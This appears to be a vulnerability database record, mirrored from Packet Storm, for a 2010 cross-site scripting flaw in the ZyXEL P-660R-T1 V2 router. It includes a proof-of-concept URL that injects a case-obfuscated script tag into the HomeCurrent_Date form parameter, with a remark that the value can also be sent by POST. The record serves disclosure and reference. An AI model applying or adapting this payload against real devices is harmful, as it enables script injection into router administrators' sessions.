ID
VAR-E-201011-0939
TITLE
ZyXEL P-660R-T1 V2 Cross Site Scripting
Trust: 0.5
DESCRIPTION
ZyXEL P-660R-T1 V2 suffers from a cross site scripting vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | zyxel | model: | p-660r-t1 | scope: | eq | version: | v2 | Trust: 0.5 |
EXPLOIT
#####################################################################################
#
# Name : ZyXEL P-660R-T1 V2 XSS
# Author : Usman Saeed from Xc0re Security Research Group
# Homepage :http://www.xc0re.net
# Dated : 22/11/2010
#
#####################################################################################
Exploit:
VECTOR
:http://IP/Forms/home_1?&HomeCurrent_Date='<sCript>alert(1);</ScRiPt>'01%2F01%2F2000
This works with the post request ! As by default this value is sent
through POST request.
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
xss
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | xss | Trust: 0.5 |
CREDITS
Usman Saeed
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 96069 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 96069 |
LAST UPDATE DATE
2022-07-27T09:25:14.182000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 96069 | date: | 2010-11-22T11:03:33 |